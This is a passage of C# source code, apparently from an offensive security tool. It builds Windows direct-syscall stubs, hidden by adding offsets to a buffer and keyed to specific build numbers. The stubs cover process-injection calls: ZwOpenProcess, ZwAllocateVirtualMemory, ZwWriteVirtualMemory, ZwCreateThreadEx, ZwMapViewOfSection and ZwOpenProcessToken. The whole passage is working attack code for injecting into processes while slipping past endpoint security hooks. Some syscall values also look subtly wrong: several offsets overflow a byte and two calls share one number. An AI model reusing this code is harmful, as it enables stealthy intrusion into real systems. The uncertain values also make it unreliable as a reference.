1: // ZwOpenProcess 1213 | unsafe 1214 | { 1215 | fixed (byte* ptr = syscall) 1216 | { 1217 | *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48); 1218 | *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88); 1219 | *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9); 1220 | *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7); 1221 | *(ptr + 4) = (byte) ( *(ptr + 4) + 0x25); 1222 | *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00); 1223 | *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00); 1224 | *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00); 1225 | *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E); 1226 | *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04); 1227 | *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2); 1228 | } 1229 | } 1230 | break; 1231 | 1232 | case 2: // ZwCreateThreadEx 1233 | unsafe 1234 | { 1235 | fixed (byte* ptr = syscall) 1236 | { 1237 | *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48); 1238 | *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88); 1239 | *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9); 1240 | *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7); 1241 | *(ptr + 4) = (byte) ( *(ptr + 4) + 0xBB); 1242 | *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00); 1243 | *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00); 1244 | *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00); 1245 | *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E); 1246 | *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04); 1247 | *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2); 1248 | } 1249 | } 1250 | break; 1251 | 1252 | case 3: // ZwWriteVirtualMemory 1253 | unsafe 1254 | { 1255 | fixed (byte* ptr = syscall) 1256 | { 1257 | *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48); 1258 | *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88); 1259 | *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9); 1260 | *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7); 1261 | *(ptr + 4) = (byte) ( *(ptr + 4) + 0x39); 1262 | *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00); 1263 | *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00); 1264 | *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00); 1265 | *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E); 1266 | *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04); 1267 | *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2); 1268 | } 1269 | } 1270 | break; 1271 | 1272 | case 4: // ZwAllocateVirtualMemory 1273 | unsafe 1274 | { 1275 | fixed (byte* ptr = syscall) 1276 | { 1277 | *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48); 1278 | *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88); 1279 | *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9); 1280 | *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7); 1281 | *(ptr + 4) = (byte) ( *(ptr + 4) + 0x17); 1282 | *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00); 1283 | *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00); 1284 | *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00); 1285 | *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E); 1286 | *(ptr + 9) = (byte) ( *(ptr + 9) + 0x03); 1287 | *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2); 1288 | } 1289 | } 1290 | break; 1291 | 1292 | case 5: // ZwCreateSection 1293 | unsafe 1294 | { 1295 | fixed (byte* ptr = syscall) 1296 | { 1297 | *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48); 1298 | *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88); 1299 | *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9); 1300 | *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7); 1301 | *(ptr + 4) = (byte) ( *(ptr + 4) + 0x49); 1302 | *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00); 1303 | *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00); 1304 | *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00); 1305 | *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E); 1306 | *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04); 1307 | *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2); 1308 | } 1309 | } 1310 | break; 1311 | 1312 | case 6: // ZwMapViewOfSection 1313 | unsafe 1314 | { 1315 | fixed (byte* ptr = syscall) 1316 | { 1317 | *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48); 1318 | *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88); 1319 | *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9); 1320 | *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7); 1321 | *(ptr + 4) = (byte) ( *(ptr + 4) + 0x27); 1322 | *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00); 1323 | *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00); 1324 | *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00); 1325 | *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E); 1326 | *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04); 1327 | *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2); 1328 | } 1329 | } 1330 | break; 1331 | 1332 | case 7: // ZwCreateProcess 1333 | unsafe 1334 | { 1335 | fixed (byte* ptr = syscall) 1336 | { 1337 | *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48); 1338 | *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88); 1339 | *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9); 1340 | *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7); 1341 | *(ptr + 4) = (byte) ( *(ptr + 4) + 0xB3); 1342 | *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00); 1343 | *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00); 1344 | *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00); 1345 | *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E); 1346 | *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04); 1347 | *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2); 1348 | } 1349 | } 1350 | break; 1351 | 1352 | case 8: // ZwOpenThread 1353 | unsafe 1354 | { 1355 | fixed (byte* ptr = syscall) 1356 | { 1357 | *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48); 1358 | *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88); 1359 | *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9); 1360 | *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7); 1361 | *(ptr + 4) = (byte) ( *(ptr + 4) + 0xb3); 1362 | *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00); 1363 | *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00); 1364 | *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00); 1365 | *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E); 1366 | *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04); 1367 | *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2); 1368 | } 1369 | } 1370 | break; 1371 | 1372 | case 9: // ZwResumeThread 1373 | unsafe 1374 | { 1375 | fixed (byte* ptr = syscall) 1376 | { 1377 | *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48); 1378 | *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88); 1379 | *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9); 1380 | *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7); 1381 | *(ptr + 4) = (byte) ( *(ptr + 4) + 0x51); 1382 | *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00); 1383 | *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00); 1384 | *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00); 1385 | *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E); 1386 | *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04); 1387 | *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2); 1388 | } 1389 | } 1390 | break; 1391 | 1392 | case 10: // ZwOpenProcessToken 1393 | unsafe 1394 | { 1395 | fixed (byte* ptr = syscall) 1396 | { 1397 | *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48); 1398 | *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88); 1399 | *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9); 1400 | *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7); 1401 | *(ptr + 4) = (byte) ( *(ptr + 4) + 0x121); 1402 | *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00); 1403 | *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00); 1404 | *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00); 1405 | *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E); 1406 | *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04); 1407 | *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2); 1408 | } 1409 | } 1410 | break; 1411 | 1412 | 1413 | } // switch (sysType) 1414 | } // if 1415 | else 1416 | if (osVersionInfo.dwBuildNumber == 17134) 1417 | { 1418 | switch (sysType) 1419 | { 1420 | case 1: // ZwOpenProcess 1421 | unsafe 1422 | { 1423 | fixed (byte* ptr = syscall) 1424 | { 1425 | *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48); 1426 | *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88); 1427 | *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9); 1428 | *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7); 1429 | *(ptr + 4) = (byte) ( *(ptr + 4) + 0x25); 1430 | *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00); 1431 | *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00); 1432 | *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00); 1433 | *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E); 1434 | *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04); 1435 | *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2); 1436 | } 1437 | } 1438 | break; 1439 | 1440 | case 2: // ZwCreateThreadEx 1441 | unsafe 1442 | { 1443 | fixed (byte* ptr = syscall) 1444 | { 1445 | *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48); 1446 | *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88); 1447 | *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9); 1448 | *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7); 1449 | *(ptr + 4) = (byte) ( *(ptr + 4) + 0xBA); 1450 | *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00); 1451 | *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00); 1452 | *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00); 1453 | *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E); 1454 | *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04); 1455 | *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2); 1456 | } 1457 | } 1458 | break; 1459 | 1460 | case 3: // ZwWriteVirtualMemory 1461 | unsafe 1462 | { 1463 | fixed (byte* ptr = syscall) 1464 | { 1465 | *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48); 1466 | *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88); 1467 | *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9); 1468 | *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7); 1469 | *(ptr + 4) = (byte) ( *(ptr + 4) + 0x39); 1470 | *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00); 1471 | *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00); 1472 | *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00); 1473 | *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E); 1474 | *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04); 1475 | *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2); 1476 | } 1477 | } 1478 | break; 1479 | 1480 | case 4: // ZwAllocateVirtualMemory 1481 | unsafe 1482 | { 1483 | fixed (byte* ptr = syscall) 1484 | { 1485 | *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48); 1486 | *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88); 1487 | *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9); 1488 | *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7); 1489 | *(ptr + 4) = (byte) ( *(ptr + 4) + 0x17); 1490 | *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00); 1491 | *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00); 1492 | *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00); 1493 | *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E); 1494 | *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04); 1495 | *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2); 1496 | } 1497 | } 1498 | break; 1499 | 1500 | case 5: // ZwCreateSection 1501 | unsafe 1502 | { 1503 | fixed (byte* ptr = syscall) 1504 | { 1505 | *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48); 1506 | *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88); 1507 | *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9); 1508 | *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7); 1509 | *(ptr + 4) = (byte) ( *(ptr + 4) + 0x49); 1510 | *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00); 1511 | *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00); 1512 | *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00); 1513 | *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E); 1514 | *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04); 1515 | *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2); 1516 | } 1517 | } 1518 | break; 1519 | 1520 | case 6: // ZwMapViewOfSection 1521 | unsafe 1522 | { 1523 | fixed (byte* ptr = syscall) 1524 | { 1525 | *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48); 1526 | *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88); 1527 | *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9); 1528 | *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7); 1529 | *(ptr + 4) = (byte) ( *(ptr + 4) + 0x27); 1530 | *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00); 1531 | *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00); 1532 | *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00); 1533 | *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E); 1534 | *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04); 1535 | *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2); 1536 | } 1537 | } 1538 | break; 1539 | 1540 | case 7: // ZwCreateProcess 1541 | unsafe 1542 | { 1543 | fixed (byte* ptr = syscall) 1544 | { 1545 | *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48); 1546 | *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88); 1547 | *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9); 1548 | *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7); 1549 | *(ptr + 4) = (byte) ( *(ptr + 4) + 0xB3); 1550 | *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00); 1551 | *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00); 1552 | *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00); 1553 | *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E); 1554 | *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04); 1555 | *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2); 1556 | } 1557 | } 1558 | break; 1559 | 1560 | case 8: // ZwOpenThread 1561 | unsafe 1562 | { 1563 | fixed (byte* ptr = syscall) 1564 | { 1565 | *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48); 1566 | *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88); 1567 | *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9); 1568 | *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7); 1569 | *(ptr + 4) = (byte) ( *(ptr + 4) + 0x126); 1570 | *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00); 1571 | *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00); 1572 | *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00); 1573 | *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E); 1574 | *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04); 1575 | *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2); 1576 | } 1577 | } 1578 | break; 1579 | 1580 | case 9: // ZwResumeThread 1581 | unsafe 1582 | { 1583 | fixed (byte* ptr = syscall) 1584 | { 1585 | *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48); 1586 | *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88); 1587 | *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9); 1588 | *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7); 1589 | *(ptr + 4) = (byte) ( *(ptr + 4) + 0x51); 1590 | *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00); 1591 | *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00); 1592 | *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00); 1593 | *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E); 1594 | *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04); 1595 | *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2); 1596 | } 1597 | } 1598 | break; 1599 | 1600 | case 10: // ZwOpenProcessToken 1601 | unsafe 1602 | { 1603 | fixed (byte* ptr = syscall) 1604 | { 1605 | *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48); 1606 | *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88); 1607 | *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9); 1608 | *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7); 1609 | *(ptr + 4) = (byte) ( *(ptr + 4) + 0x120); 1610 | *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00); 1611 | *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00); 1612 | *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00); 1613 | *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E); 1614 | *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04); 1615 | *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2); 1616 | } 1617 | } 1618 | break; 1619 | 1620 | } // switch (sysType) 1621 | } // if 1622 | } // Client OS 1623 | else 1624 | if (osVersionInfo.dwPlatformId == 3) // Server OS 1625 | { 1626 | } 1627 | 1628 | return syscall; 1629 | } 1630 | 1631 | 1632 | 1633 | 1634 | } 1635 | 1636 | 1637 | 1638 | ``` 1639 | --------------------------------------------------------------------------------